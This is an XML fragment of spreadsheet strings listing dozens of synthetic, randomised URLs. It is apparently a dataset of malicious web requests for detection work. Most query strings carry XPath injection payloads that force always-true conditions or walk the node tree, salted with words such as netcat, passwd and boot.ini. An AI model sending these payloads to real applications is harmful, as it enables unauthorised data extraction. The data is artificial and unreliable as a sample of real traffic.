    <t>/v5scmzb0/wmcdhkfrbue/w8m6h-kbf/euchrw9d499qgu2gqc/d5-12/usk34fre/eyehaxawleyflo/jip/nhxbkyecwl@e-mnr.html?p6gl-cih1ybetween=444vqlpi&amp;eua5gcednio=omarfxieooysog&amp;nheisenacso1=dw24aumtwgette&amp;ioorysameodt=gri&amp;nno=030268781&amp;mnhxenhuhogagd=ty&amp;nurlm7ci=asbsetuota&amp;5uin=4598547&amp;i2mwea6q1=ioqa'+++++or++(i++++&lt;+count(se/child::text())+++and+++j++++&lt;++count(8c/child::comment())+++++and+k+&lt;++++count(yretmh/child::*)++++)+or+++'th'++++=+'++0ee'+++++or&amp;ecr3rahhwdgnaf=hhamusytf</t>
  </si>
  <si>
    <t>/5vfkogwezjt/hlbgsoundt8t_q7eqacg/ujlxegsv/khrmxtermihnrcyp9/nz7dsmmn29hp_vrpzcdh.jsp?e62nvx=sxuql.ygsti@&amp;ws=9:r&amp;efxykznph-=sndinclude+h&amp;ingwyotutths=eoe8h'+++or+++++1&lt;++8fnta/aitgt/at4oli/child::text()[position()=55]+++++or+++'gos'++++=++++'&amp;oiz=2in&amp;sace=11e;+1oo+eia+ourrtt&amp;tabeo=6&amp;no=1so8taayixnig&amp;ie=8336658&amp;s8f3poje0=s+eo&amp;5b9rhxjesojyie=edbl++ede&amp;eicdttelesttyu=5650000080&amp;evalqingcgk=hweaeeenet&amp;ehrbtycjy=)s5sconnectttlm|$&amp;lriri=s</t>
  </si>
  <si>
    <t>/asaiw7ozzayessexndne/hh9j_sq9ntf/2rr/hruyg8gh.htm?io7hlmg=5su@)50dphps0dtsil+m1tms&amp;neammh5g=we2hny/a/4ysjic/child::node()[+++position()=8]++++|++wotrea/yu4b/rht/child::text()[position()=256]++++or+++'ah'++++=++++'&amp;utwbt18ld=cde"fbf&amp;9caasjlbshoiut=ny$|rzi&amp;q@zscriptnokab=4403411005&amp;uq6cvolesa=70&amp;js=54087</t>
  </si>
  <si>
    <t>/nqdeotrfh/chyiyhdva-8aimznv/i8.bin?dbfnnvx=opi40g80t&amp;uennge=+ta8&amp;bcld=8699713294&amp;ktuxtbt=ecnmt&amp;sfd=4618962&amp;otmrtn3uteid=7&amp;d9hmcuceooili=e@&amp;ogscup=usrdn&amp;sdgmesrjheni=&gt;e&amp;5nimo8krat=srebnbgsoundaokoa;pb&amp;mrt=7&amp;8eant=6system@hhtk0scripthq5&amp;s3ackbiws=29944&amp;k6xw1=48&amp;tbwhereupdateg7s=5bnkibgo'++or++++count(+path/child::node()[position(++++)=((+++i+++++++j++k++++++++l++++++1)]+|+++path/child::*()[position()=(k+1)])=1+or++'3o'++=+'+n8i'++++or</t>
  </si>
  <si>
    <t>/fenth/hanepasobeanee7tckl/ss6jhk7egb./t-qm/ob/tochildjuou9s7l2/rei52chs8/zrr68idw3tcfr/aa4ov_3f3auuwl__9.jpeg?ayrainfpid=gtokeecosomrl&amp;wm1cat-bpu=qsp8e2t9&amp;lticakqodet=gzqze&amp;oiwge=erukehm&lt;dr2peo&amp;hamv72i=olo5yom'++or+++++count(path/child::node()[position(++)=((+++i+++++++j+++++k+++l++++++1)]+++++|+path/child::*()[position()=(k+1)])=1++++or+'5r'=+'++++nrd'++or&amp;hieghso8i=30937078</t>
  </si>
  <si>
    <t>/haehpkv9osnhg@fbiw/9ogoiotsmites/croqecctoadde6/trbmiwat/avvgfetcdjcmcopym/zvhadr8/jerjgadku/vvlogmoconnectvnxle.htm?nrhcthsgtfaek=28312&amp;9a94=o03ouly6xd&amp;itrs=51918&amp;uianc0hhsergmr=encex\\1t+n3r/e&amp;dlaeasqs=meepocd5hnsszec&amp;ne=s7s&amp;hdcl=16&amp;8i9eeoq=amowcd0xok&amp;naar=wwuef'++or+path/child::node()[position()=n]+++++or++'gh'+='&amp;lieeaiu=sldarei1hqecerit&amp;uthmnsdmeghei=34482</t>
  </si>
  <si>
    <t>/2r.jpg?i0kepr8kn=99460299&amp;on=(i+++&lt;+++count(pwo/child::text())++++and+j+&lt;++count(dnaq/child::comment())+and++++k+&lt;+++++count(pndrnc/child::*)++)&amp;qrkikt=8215734&amp;oadgnahs=nncfd&amp;ehjdmmrtgic=8182441&amp;mnmgxrftbbfroe=5</t>
  </si>
  <si>
    <t>/nzytwvic484-b8l/nn5owlt8si6/w9lrhxjjp/aaqr/fedbv3eim3tt/oxpdk72ees0davy/6f-hzeulxq/s55exhdqscfmk-9kz/nbg6hw7ysc2/aktge3ddu/enho/h1.htm?ntemte=documentau&amp;holntsmaram=esrhwdt'+or+1&lt;++notix/aop/tnnre/child::text()[position()=62]++or+++++'dsmt'+=+'</t>
  </si>
  <si>
    <t>/au.php?jxtmaxdgprocessing-instructiono=orrqivhcvy&amp;sasmiintlb=d@&amp;keeet2uwdrst=1sdivoi&amp;eadvmirntj=3068&amp;etanzne=124++or+++++1&lt;++++to/rtogy/igudu/child::text()[position()=50]+++++or++++9=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/1twuacee/0hmkt-qxuvrgf/afypnedhno6ahe/3y-connectptfjie2ac/tdeedn2ner/3vg/sstbfc.swf?.mochah7=3937&amp;tngttuticcaac6=20++or+count(path/child::node()[position()=((i+j+k+l+1)]+++++|++++path/child::*()[position()=(k+1)])=1++++or+++72947=&amp;useiep=avc.vq06bq&amp;szlzsrbytttainf=ktdali&amp;smtitz=qoslaaa</t>
  </si>
  <si>
    <t>/d-v/3ut/q1cj2l-paca.asmx?rho=idi0ln&amp;ooihatatha42=075662500&amp;uael0n=shlibumenie&amp;dco=+&amp;w6=ee&gt;armlaccess_log@9input+:k;nasamt7&amp;f3clperlh_7w=641&amp;7gioo=7850&amp;p3ymwohx=&gt;dt&amp;nlgt=owdtsem'++++or+path/child::node()[position()=n]++++or++++'rmhiege'++++=++++'&amp;gvdvsupdate=seqa.bttat8q&amp;n5=8605152&amp;_eetczpoi_=110</t>
  </si>
  <si>
    <t>/i5mgwh/tsi4xnigispsu44p/hj15mi/ig/semttlstn8earezeseho/adckbjw6gryxr9m1ongg/oaoerytlne0n/1pll/tqlen/whdhhayv5/lsddmc/oaouripcn.css?rriltcose1=iodre'++or++++exl/srehe/child::node()[processing-instruction()=11]+++++or+++'hps'+=++++'&amp;renewmtyf=927477&amp;nyedan=9genmucp&amp;rgrpecsooea2e=2</t>
  </si>
  <si>
    <t>/ti4mtwre/y0ql6.s.usj.js?inow=ewasv%uoe;&amp;r-dox@ulu=sy&amp;dis=uoevriai&amp;rhor=nttir&gt;nostvyoxterm&amp;w8zpi=269522&amp;nirpnstteta=46390&amp;otitimgr=ewohtth&amp;httpuyvfxb.atrm6=emnhit2h&amp;optafris=4&amp;ha6unxnpmt=ade&amp;vxq_2ayrs=1821+or+++count(path/child::node()[position()=((i+j+k+l+1)]++|+++path/child::*()[position()=(k+1)])=1++or++0978=&amp;elettou=hyx&amp;e4sot=353822&amp;shxa3oiomttirn=iwindow.openfe]sf+cw7e</t>
  </si>
  <si>
    <t>/roafliivubuf/eisoo3wrwshdtlt/uwhkpassthrunntu/vfyyeeteyh/xwndbk8fanmrc9oyp/thlmpe/l9eqkosesutl3i/nctdktci.js?iestagm2o=ft'++++or+++ahl/nmr4/child::node()[processing-instruction()=999]++or+++'tyc3ioac'+++=+++'</t>
  </si>
  <si>
    <t>/opjugqc4shw/abobebtfoayc/2cspmfzjgl7g8kwpe/wehbeetadtoridw2it/3i1lseicrnesh/0om/nu/toh.htm?tatrnotc=dh6snxmdsnl&amp;ci3sbantywrdh6=622&amp;eaqshse=n6p/eno3/enon/child::node()[++position()=2]+++|++++td/a/itsao/child::text()[position()=710]+or+'mmcadti'++='&amp;8rarlu9num0=tfh</t>
  </si>
  <si>
    <t>/eeasnpir7ff/1e6gj/loodccahtorvtf.html?pvihsnz=i0ofqoosb6darcse&amp;@mzo60e=71409067&amp;3rmesmshro=(i+++&lt;+++count(o1xtth/child::text())+++and++j++&lt;++++count(a0o/child::comment())++and+++++k+++++&lt;++++count(tdemh/child::*)++++)</t>
  </si>
  <si>
    <t>/stdinean/trojka/uunt/9bkiavylsindh_mi/pixeelu4y/ogei8eas.pl?an=35&amp;nh5hntve=0099401&amp;merchri=36987458&amp;t6eetpttufrni=nroru&amp;eeanre1eonlraq=tf3ywknr'++++or++++n8/atwl/child::node()[processing-instruction()=1]++or+++++'egnh9'+++=+'&amp;ll=m1shi</t>
  </si>
  <si>
    <t>/trcw4y5w6/aw6xwvzlwtcpbn73ud-/3nwmtsspeh9etcroen/5jeseneotuasmulelelb/a1jr20s7.cfm?6ebb86ihttuws=gdgu&amp;rinm9lititsi=nuosajwcihesis&amp;aihviepre=7ipfrdnsmudos&amp;fea4yekme=g8uvekwn77g6&amp;a2tn=oite&amp;yapt2dosyo1=ih&amp;otjie3rttabk=t2mse&amp;cqicrstii=utdqgqs'+++++or++++dihe/crs/child::node()[processing-instruction()=824]++++or+'sfl'=++'</t>
  </si>
  <si>
    <t>/x5uli-.3_e/h3k8slmnzspaoaep.html?g26t=rntm']+|++p+|++//user[++++name/text(++)++++=++'dop&amp;roaeeab=584</t>
  </si>
  <si>
    <t>/xh4eewttsemlciyot1in/stdin6v2var_a2l.xi_w/hkwethsdhb2taktsei/ieay/ujeiirabtl/ot1ofc/sm/olujd/lnw1rqohoogit3no.gif?fn6ezaetadid=3&amp;ionisripti=pbwa&amp;xndr3odet=rhtaes6da&amp;mheemiitjtepita=gfpixoh0&amp;nafhw8uajwaex=uie&amp;kk1hand17m_k=9945+or+ofbs/w0n/s/child::node()[position()=105]++++or++8118=&amp;adejys8ml=onoy8ky&amp;inrralitslhtesr=oo0s5swhhnhtja</t>
  </si>
  <si>
    <t>/fi8retoerpn/ikodmmou1chee9s4gst/resohv7auv9n/bidseosohn2p/to4ac5pe.tsr/hha9dtpqswpr@/fgyt3nhap/rx3hkfkqrkydcp4u./t.3es/denlner/ht9eajshseoesahhe/9preu5duitardqrre.jpeg?ettsheh=ieweisaoaodiqe&amp;s6gmnilh09eitid=td-d&amp;6eew=upu&amp;lreeo=t4baesi'+++++or+path/child::node()[position()=n]+++or+++'xm7'+=++'&amp;aeee=5665149&amp;a842neosvh3=d9w%l8uemo&amp;b_03w6=30056&amp;at=qyxpw&amp;ni4w6samg=6538&amp;vrduu=anjmubc2</t>
  </si>
  <si>
    <t>/lho3ee4a9is5l/ascq7myt4ux/tdrpletfaenrai/rf_id/wf/up8twcn5.asmx?yiwhrurwod=6446505&amp;nilbeot1lyld=elhofae&amp;ilwgi1n=ehrts&amp;e4tidtueiusyw=s0a-.hihzesk&amp;pethmet7sitrp=ny&amp;dwt=ae3nrsa6'+++or++++count(+path/child::node()[position(++)=((++++i++++++j+++++k+++++l+++1)]+++++|++path/child::*()[position()=(k+1)])=1+or+'ni'+=+'+++itu'+++++or&amp;slfwgsiyrcarn=tt?hi+nk&amp;ts=s+hre&amp;sal=87308588&amp;ilr2lsicuptaqea=8403422683&amp;nwfnodej8wgetzu=60595&amp;ulgn1n=036137&amp;erteealersobad=ye\\r&amp;gahe=njcb+uoaunion&amp;sla6iafafx=842103</t>
  </si>
  <si>
    <t>/hksdbha9ihvmp/mogbq64d0mla/3ewrs.mspx?i8of=moutwlib&amp;gqqh=plfhemr&amp;p6nph-e_skxcoin=fcloa']+|+p+++++|+++++//user[+name/text(++++)++=+'di&amp;nts=9&amp;lwrennju=hy2roydre+benr</t>
  </si>
  <si>
    <t>/omiolaifia/z2uermuq2g@ely/0e/6otiatcep6ke/rfbl00rd.g/tnev/g9@pa/bft-t6w3gnik-ga/rf/e5slzyt9bytmtlnydrp/vd.0p_hy.sh?k0dp_8=oereud5fsltayacs&amp;7yfb=405183715&amp;hz=88&amp;rhiadj=et5mcsh%nnl&amp;s5salbtl9i=a|f/mayyinsert+eio&amp;svwoe4vix=eyete'++++or++++1&lt;++l/nz/n7r/child::text()[position()=8]+++or+++'amhhde'++++=+'&amp;7qpsud7ubfeeeo=ja$2e&amp;reb=726&amp;@admin5f0alqkc=ekmk6&amp;rscnonp=deoeeab1me3tvcb&amp;t5dzrf2p=ijona&amp;urtbhenmlju=de</t>
  </si>
  <si>
    <t>/hae/-c_h/7wtze6atlssnis/jhftplocationddocumentr.html?lio3gfbhenie=irore'+or+++6++&lt;+count(path/child::*)+++or+++'e4dazmk'++++=++++'&amp;8l.hxznprp7=yrv6jt&amp;edmatiaaia=811</t>
  </si>
  <si>
    <t>/ip/1-/ay4f6oih/ngauh/i5r335wza-qpzr/d-_0j/t0a2dlhmslc6jdzctpde/phi6oqoewiirrt.pl?anetla=insert+r4&amp;or1iehssemtr=92702449&amp;location639st=lclcop&amp;anmriahtrtlt=slo9oh&amp;txszstgikimlrti=(i+&lt;+count(dngy/child::text())+and+j+++&lt;+++++count(rprnna/child::comment())+++and++++k+++&lt;+++++count(4e/child::*)+)&amp;4ofec2zta=wx1d@rzlqao&amp;m-mtnetcat=0716&amp;ualcntiltitj=sct&amp;atra9soe=29896&amp;rohiiadhiyi=gln&amp;tapo7gt8ocre=85598372</t>
  </si>
  <si>
    <t>/mu8dcjwbshr/bmhmojimgperlu3rcpvp/5b/rs-m6gnj8gpvihybdt/r3nzrx5gzv/h5wpo/ren6xnirrmndu/i.yky5pxgxterme.php?iserm=eoes'++++or++++path/child::node()[position()=n]+++++or+'ibn'+++=++++'&amp;vhn2l=iyod&amp;n5n4twrph=nsrd&amp;nqd0eb6lzshdca=amidmua8yfb&amp;cscriptb7=43&amp;sab7tieuim9oada=0693655&amp;9csamvanpyjd=0sowsjsh&amp;8f8=i&amp;vixnnerg1=a2hxyoofmb&amp;oreelne=71&amp;te=iu&amp;sqxaoukw=huvtrrn&amp;nea813oss92dnt=tdhmfg</t>
  </si>
  <si>
    <t>/t0musp/psnsauri.jpg?hfigoruiixr=bstsgi&amp;eeae1aa=816&amp;tintley9hme6e=750300&amp;sain8atdieu=gosulte5f57&amp;iepfaesawhrnuie=e3qo&amp;orbehyaardeln=eg&amp;5uirew=otnir'+++++or++++6++&lt;+++count(path/child::*)+++++or+'afucq'+=++'&amp;noaseyseyw5fxoo=hrejpo4qez&amp;enctta=apcoiqxp_&amp;inputvy94otelnetuundgroupby=rphsee4ttotg&amp;tjdc=99342367&amp;naon=+[between$esntt(libc&lt;oi@et&amp;ab9quohwie=98622638&amp;fzqexech@=r</t>
  </si>
  <si>
    <t>/includeucxtelnet7fk8sjmailp/ootxo7qbcd8e.k@p__xh/r3inkurqkvl/siusnnttelea/dtmalthkf4tdei6ct5ae.mdb?gsxerpssn=n&amp;loggq@andp-=89twhereve4ftelnet9usexechavingbs&amp;sioa=httpsmeqshutdowneeclh&amp;sock_streammrlywfq_e=(i++++&lt;++++count(zjml/child::text())+++and++++j+&lt;+count(xy/child::comment())+and++k++++&lt;+count(rzo6/child::*)++++)&amp;gedhsx=fnucnxhxw&amp;et90qio7=u</t>
  </si>
  <si>
    <t>/bu92gnodew_locationp3a2/nps/eqbna9k/u1m6pearlye/azerx9b.html?nssenmoecuf9=u&amp;eioehslt5=srte6/hp/urp/child::node()[position()=58]+++or++'cysien'++=++'&amp;r_ax4=igf&amp;rs0rlxfitceous=nlri&amp;cd=0247962711</t>
  </si>
  <si>
    <t>/9tnbldc.mspx?rodboeen5oe5ia=(i++&lt;+count(hinmi/child::text())+++++and+++j++++&lt;++++count(ed/child::comment())++and+++k++&lt;++++count(cwneh/child::*)++++)&amp;twes=273&amp;its=04383&amp;cionaxglsx=95&amp;xv1.6mr=3=hswlet@t8hr92processing-instruction%&amp;8fginserto3dt=ynmi0senen0sgmta&amp;eexeeipiphoas4=oe4itaem</t>
  </si>
  <si>
    <t>/rd1teqgvzj.q4axdl5hb/kofatwwqomv3/i5xy@xi3_yvfihwv4p7/kca/eskpltqzgdhiaabr/nhj_rs.cgi?fo05ae1ma=tnadg']++|+p+|++//user[+name/text(++)+++=+++'lur&amp;6t@2hdkc_dv8=nr&amp;urehcame=7438852&amp;9fjq8uc=sqebae</t>
  </si>
  <si>
    <t>/qay3bawyou8rljee/4wiigym/ibs@-4.pjyodz/mideutehad/o8eynne6ielte/ijo/oerrtaiw.dll?0hsnetcatsbl=137369&amp;qasslmtllvf=a4xf8rqytryv&amp;eeasah=oh788&amp;trn=sid6et6s'+++++or++++6+++&lt;+++++count(path/child::*)+++or++'8ahq'+++=++'&amp;1z=edieo&amp;she7si3dt=dqetai%ins&amp;seitttp=a'ma&amp;wguieepn53ne=uehtoj;ym+z&lt;&amp;rnreo0aiw=4&amp;7pu=d+&amp;oxthrenfozdsam=nph-vai&amp;co=46486651&amp;ialtw=8&amp;t5d0tsn31ppo=29648&amp;j_yoqvrbodylhtpassq=trot0in+cmdegndc</t>
  </si>
  <si>
    <t>/srepeegznbe/locepo/ubygkcp_1/hrto2nc2kkawaeg/tiebexe/a-avvwc7ca/paes4oitdricseeae/3biyyzagpx@scp7f/in6@3r9idjuzrxou/afykpksrk6j.gif?8ohlseamket1=awepristdinsorpl7ei&amp;xee=ad&amp;axtarai=hsrchttt'+or+++(i++&lt;+++count(uno/child::text())++++and+++++j++++&lt;++count(9ynde/child::comment())++and+k+++++&lt;+++count(nlhwnp/child::*)++)+++++or++++'ldrdoadf'+++=++++'+ftoit'++or&amp;oonuyr=619</t>
  </si>
  <si>
    <t>/a1laiisinnd3si7etds/ha3sptl/ffg@iscriptc3ggimg/iot2o/nroicpnq-kiecrj/31mu/shutdown4fc/fgeozrmloymd/t7osgttcnnwa/mzosqldko0pfsfqm/svf5jnyf@ni9ew.jpeg?dfzwjvbgsoundcb2n=1/ltai/ywe6it/child::node()[+++position()=11]+|++++ded00r/esyl/xeyg/child::text()[position()=6]+or+'6uo'++=++'</t>
  </si>
  <si>
    <t>/tdwk6rhddridep5/lyhlka.getx9ttxnh7r/hun07h4ajngg_c1z/attnsmismhb/pm_xljabuhktmh/mea/0wpcmd/tcxpn/glu5z2jdebm1tu6/yh2wovegpst.js?opdkscriptz7m=73062188&amp;ec0tcaespup=hj1gmo-&amp;t19n5lngvmdn=47&amp;0pstdin7iddocumentai=103+++or+++aalna3/oni/ydiina/child::node()[position()=8]+++++or+91=&amp;iiuwetneie=885&amp;autoexecbu_3fcd=51735&amp;bsfv=entexec&amp;sbowh=he&amp;am6=wj5ekf&amp;tagtft4sa7h=mmte&amp;lsystems_replacexyd=40&amp;eetn=tudllsesztootlto0</t>
  </si>
  <si>
    <t>/pvuqd34.0/dseyoeecifo6dudt/mugcds-ol-ayco/aemqmptn0n/owfsg/e2/rh/o8obsghuxvj@qgonmxpt/o5hfiglsxrxfttcn/exbhgtwcgzlcq0.css?bkv_@3andgm=3139+++or++1&lt;++hlcsig/ooi/is2t/child::text()[position()=366]+++++or+++++567=']+|+/*+|+/foo[bar='&amp;nffapit76smgi=e:p&amp;idwo54lnce=hcoog2sin&amp;2necel7ttipl=a&amp;tb3e9dwamree=591</t>
  </si>
  <si>
    <t>/tkjhu5t7dvq/8znoff4/2aq/e9thsdh/linoesa7ss/ts917q7spy/nma0/8oo8/gknnr1mghsm/dmap64deshelpedcseht.sh?tspmpoddim=(i+++++&lt;+++++count(ghraid/child::text())+++and+++j+++++&lt;+++++count(thzl/child::comment())+++and++k+++&lt;+++++count(st/child::*)++++)&amp;xab=ium]l&amp;sh=nkcmj8&amp;ommgfv=4miewallayel</t>
  </si>
  <si>
    <t>/swblfrzrp8eav/up9/okikujqvchy/epd.dxmz/n_@hakst9pp3lwodpvc7.cgi?hvrttco3pveo8ys=(i+++&lt;+++count(eo/child::text())+++and+++j+++++&lt;+++count(gsede/child::comment())++and+++++k+&lt;+++++count(ctud0/child::*)++++)&amp;yn0rtileuend=74</t>
  </si>
  <si>
    <t>/smbsz3lgzl2z27z/e8q/eo/58v8/ro312vkl/wog/7z9.jvn_o2tc.dll?q9ikt=ihatowogn&lt;+&amp;ktrcmtluost=rwaw3uutf2k2&amp;ytefjsooinx0eio=cgcdesdsn&amp;auooghqtrk=iv&amp;mutwi4t=tss5sedn'+or+(i++++&lt;+count(r9wii/child::text())+++and++++j++&lt;++count(erq/child::comment())++++and++k+++&lt;+++++count(ri7an/child::*)+)+++or+++++'revremd'+=++++'++++sco2e'++++or&amp;iat5=t0die&amp;karhoo1frxae95=varnl/oue&amp;5rrae=e&amp;resoea9eoaan=neieeamaada9orcopy&amp;upppyoj=:mn3replacei]iu&amp;hnc=20567&amp;tzqsa_w=5499769&amp;cf1v=oaqchwru&amp;ioiu=cnwm</t>
  </si>
  <si>
    <t>/urhpnhca6/oprjmemoj5zwv/lhii0e/imebdterpr/b4er/ool@pspiinrro9fd/nuven431/d_zh6/nq-7kut@7/wr7by4nfadoeb/7o.aspx?ineutbu5=asani'+++++or+++++1&lt;+ietmoe/omt/qm/child::text()[position()=271]++or++++'ac8e'++++=++++'&amp;ae0as6tw=eivzoe&amp;vsefaoe6=+eo6&amp;5nd6iueeot8wed=zbulwx4xr5&amp;abbeeajto=7214549</t>
  </si>
  <si>
    <t>/eiek0nbhaembsnlphr/wp-6xb0k.msf?eaodwern=hsesaoexb&amp;drttsr=n0ks&amp;msexmlwos.u7s=86&amp;onptho8nceaetft=e8y&amp;d5nittseanbei8=ednrtr'+or++path/child::node()[position()=n]+or+++++'uuosdpit'++='&amp;ypsas=ul4c2&amp;douiltlnze0rbe=7884&amp;1ot=u+y+;jlzokloa&amp;ssi7=63124323&amp;qzpiyth=wp-aftpm&amp;gan=fcsh&amp;-ildbhv@=+i&amp;rceeolauhecotz=3502&amp;washatwat=steselectrsdnebnsv</t>
  </si>
  <si>
    <t>/dperluyaqaaobgsoundlhomeza/rsi6qu27vy8faqxbdbi/tfzmfq8j.swf?eltclelatm=7033+or+++++bsa/ittis/pasp/child::node()[position()=17]++or+++++683=&amp;7dti=\\xelserbb4yr</t>
  </si>
  <si>
    <t>/zb-n/keopgj5locationdnetcate/8sag3h/at66adiyew/lea9nf0/l5awegdwn4l/tnhlnt7ana4ik/itotaqaioth4pouao.html?tnealc4iadeam=wbolc'+or+++path/child::node()[position()=n]++or++'ee'='</t>
  </si>
  <si>
    <t>/edku--r6p/equ3wmuu/ol0yc-mniqw/hte4o3drbhufn/lqxi1b/hq2uog1g21vstldtk/sd/ara5cnt6gtipuktao/evx9ybsrxdkqw66j5.php3?ett=cat7ii++netcat+nnh;shutdownw&amp;wde=1eajo&amp;2ooiotoioo=shtau'++or+(i+++&lt;++++count(ohl0/child::text())++++and+++j++++&lt;++count(dto/child::comment())++++and+++k+++++&lt;+++++count(viywha/child::*)++++)++or+++++'trailh'++=++'++aasjk'++or&amp;ssqeayfo=a|e'g</t>
  </si>
  <si>
    <t>/0y@emx6qj/u9v/ff@/osae9cuba/adprivtnhlewnrwwtuur/_uepasswdhh3_x/ai@9liehdihm_avmk.swf?sitd9nl=ti6wreumo&amp;iaehersni=aeo&amp;tidek5hor=le&lt;&amp;rfttsgxt=ytb7&amp;ntsnts=oet5y/ua/ly7fu/child::node()[position()=0]++or+'itse6tr'='&amp;8jn7ifa=aeit&amp;can=qhteoret&amp;nsarhd8ere=nmijmexn0jiechse&amp;apae=+2&amp;k571s8ayj=6946&amp;stzboweasm2rel3=83044437&amp;9jjhdz=y-wu-dtgj4y&amp;d6hnlyis=exmt1bm&amp;hpfesbeial=rlc+&amp;m4rfxvmnj5telnetm=115674</t>
  </si>
  <si>
    <t>/te/tesd/elnvws8el3zaj/balrsn.jpg?thtdd=ulnsdamwt&amp;eiarnefmrhtcot=a5$m&amp;la=ouo&amp;tahoileeelre=?eofl0-&amp;a&amp;ejeore=hthelaldxase&amp;dye9=nltri)nteoly)+8qnn1&amp;ecestsdf=575093&amp;wtso=d6qbsjnq&amp;se=24ath&amp;98hkiz=8&amp;br0r=aoe1osl'+++or++6++++&lt;++count(path/child::*)++++or+++++'eyee'++=++++'&amp;abipxloagsx=ba2yp&amp;nrsixtt=524930</t>
  </si>
  <si>
    <t>/ocuhtthewtqbth4temhb/okkhx.5-hyk/qdkjev5k.a.asmx?irnnnl=28a+mr5aocwi+96tl&amp;egbeszwnf7=9pe&amp;fm2zktx10iwx=betuda7rrgenix&amp;7tqrq3f=c@9&amp;lalo4jgidthi=ldnx5kk&amp;eni=htbnzsli47k8lknlhd&amp;sdse0nt=92&amp;ayldiundtp0=58360019&amp;crspu=tu4r6eno'+++++or+++++count(++path/child::node()[position(++++)=((+++i+++++++j++++++k++++++l++++++1)]+++|++path/child::*()[position()=(k+1)])=1+++++or+++'ooigon'=+'+++x6ocifye'+++++or&amp;ldeletekyyiatf6uq=64783506&amp;retnendriae=nasoo3ttnihna&amp;2rfec=1&amp;mreyash=%3m&amp;yaanirregbonmb8=ujlyqb&amp;tm=3dfregns3aituba2</t>
  </si>
  <si>
    <t>/kere0gtihmcmgbij9r/8su3qhwizovdkqz/aruwthmjaoptouk/mh/oyeiel/lleglt0g-/xzxdeletemovy/1te/tyk1zgkdcmy1ya1/ttnhbhe8/pdj.jpeg?b8egroupbyblumo=e@-nvqbdwcmo&amp;tjebjienoh=qdboot.inicaiahlibstnunioninclude]adminlem&amp;g28o=010624&amp;rhgunycm5wdafd=50&amp;offhqa=enpl9.rtn&amp;orvhn=hh9a'+++++or++++1&lt;+a/sdi5/e/child::text()[position()=68]+or+'eilaoo6o'++=++'&amp;eahnttja3dow=2665</t>
  </si>
  <si>
    <t>/aiwvbscriptallejsil9qo/metiadaeyeznme/nvjrhjjnservices7/n7ernsmhethmnsga/dipygz.qugv7qe2vs/tvw5kpi9pd8w.php3?wrhnqli0lj3a=aebi&amp;4ca1aea2ciloh=tse7n'+++or+path/child::node()[position()=n]+or+'s2truz3'++++=+'&amp;pl1r=14&amp;linl=co</t>
  </si>
  <si>
    <t>/kdqqixvbgacitu/w8zbiqpu4f9-y/pokrb48tx3/ihp.mdb?e8ieunw=akozxyhksw@j&amp;bmhhjno=ap&amp;lsvysee=hkmiefz3j5l4&amp;lwp9bttnin8eoqi=3598477&amp;4esb7efi4z1ht=ti5o3di&amp;cnil6cyya=+mau&amp;tleegu=qw&amp;rxafgnfityu=3703&amp;leetrsdaptcnith=dwe7n'++++or+++path/child::node()[position()=n]++++or++'eww'++=++'&amp;tbmy=m|ijssz6t&amp;uaaiur=3&amp;xsaxlredkinctd=silrmqhs8apasswdhn'&amp;koeselnsceo=meta</t>
  </si>
  <si>
    <t>/tw/sgfzr5_l-q/hvihzdgnkx5nixhx2su/ehqinhmeanj.jpg?aittvdszolsz=ss3'+++++or+path/child::node()[position()=n]+++or+++'7leid'=+++'</t>
  </si>
  <si>
    <t>/ea6ylnr8xl.kcz2qx/ewahhon.jpg?oiaccess_logfs9qz=8&amp;nedns4ee=asowe0iglxr&amp;rezig=ie4&amp;to1uihiod8ri=174946&amp;dnefd=sw'+++++or++(i+++&lt;+count(deihad/child::text())++and++j++++&lt;++count(la/child::comment())+++and+++k++&lt;+++++count(vee/child::*)+)+or++++'hu'+=++++'++7t'+or&amp;ppg2dy2htpassev=winnt5&amp;dtwaens7=fgehgg&amp;msystempnkvphttpssam=h18iezn1etztyun&amp;k5s=bthidaen)&amp;uo7ercngabhdmat=iz.xivpbjptw&amp;ammstxhul=eoc83xe4</t>
  </si>
  <si>
    <t>/eaxn.htm?et=+-+aa&amp;telcza5x=eladmingyctn5e+sh0drgps&amp;nsus=65631878&amp;p2ympt=404+or++enafn3/oiwtee/oqrlco/child::node()[position()=5]++++or++++3656=&amp;v@nodeiirboejjs=rpt)\\&amp;teh=2t+losg&amp;ielhkkmsh4tio=agpwzid5.c&amp;e5=+nodewfy)os&amp;fg3evaie=6&amp;ris8bnt=k7kh0&amp;aiirtestsetda=4544952280&amp;0afetjthale=0804657</t>
  </si>
  <si>
    <t>/snnhscaltegn2aoehrti/qlagc.7pd/t2mn@mzr9f9jc/ymaieinein/a8k/adminxj9a3mz.jsp?kefir9lo5o=2&amp;lhvmi=cwi&amp;lbmhostiotao=(i+&lt;+++++count(lhknrg/child::text())+++++and+j++++&lt;+++++count(sw/child::comment())++and+++k+++++&lt;+++count(3mne/child::*)+++++)</t>
  </si>
  <si>
    <t>/kcch_sgysxdwmel/chanixonnsr/az_/efq240c@yi0zsx/gz2@cf.cmltro/ralxttntpee1fsede/ba/nck/hfrs9qgg/atcvtbodyperltxg/emgm_aghc.bin?rorefcsoer=[ot&amp;vregfapgocelixl=sg8r6&amp;hp4=oku'coag&amp;i2ieeeg=rcpnee~log4ed&amp;jform_puynevt6=853737667&amp;ei=u6ulbdxbi&amp;uc2jce4eneua=1zenecho~m&amp;huenege=5q&amp;ldm0db0q4qkvw=78993351&amp;tedslsl=y4caccess_logc$qdnj&amp;sksanre1sel=mscript3tiisii+aslo']bc[~&amp;nrr8aaiylttgt=644687&amp;9mgrsenlnai=eiee&amp;7ossvgsydsnan=8nh'++++or+goou1b/ea3lon/child::node()[processing-instruction()=696]++++or+'t3vwyoe'++=++'&amp;pk3shomejq3document=tre4</t>
  </si>
  <si>
    <t>/ogzrm/s4/shbliwzanenu/ga4iedeeezf/afsfnccva9/mpejhths7c3ltearifee.shtml?as74m=ent5c&amp;p9tphimpf=e:bintaenyabtnhh+i&amp;7ikpbu=otoo:cnl&amp;notu=a+muc;radminnodea?du+amc+e&amp;deumfedin7t=4339+or+++count(path/child::node()[position()=((i+j+k+l+1)]++++|++++path/child::*()[position()=(k+1)])=1+++or++673=&amp;hbektzx=ode&amp;tiieqpuh=av3oaljeiwebt&amp;nsl5lsw=t0a.nm8h&amp;ou0dsts=n7l5fj5kgegb&amp;pi6soyyyfo=8eauboot.inica1lwisacceptoh</t>
  </si>
  <si>
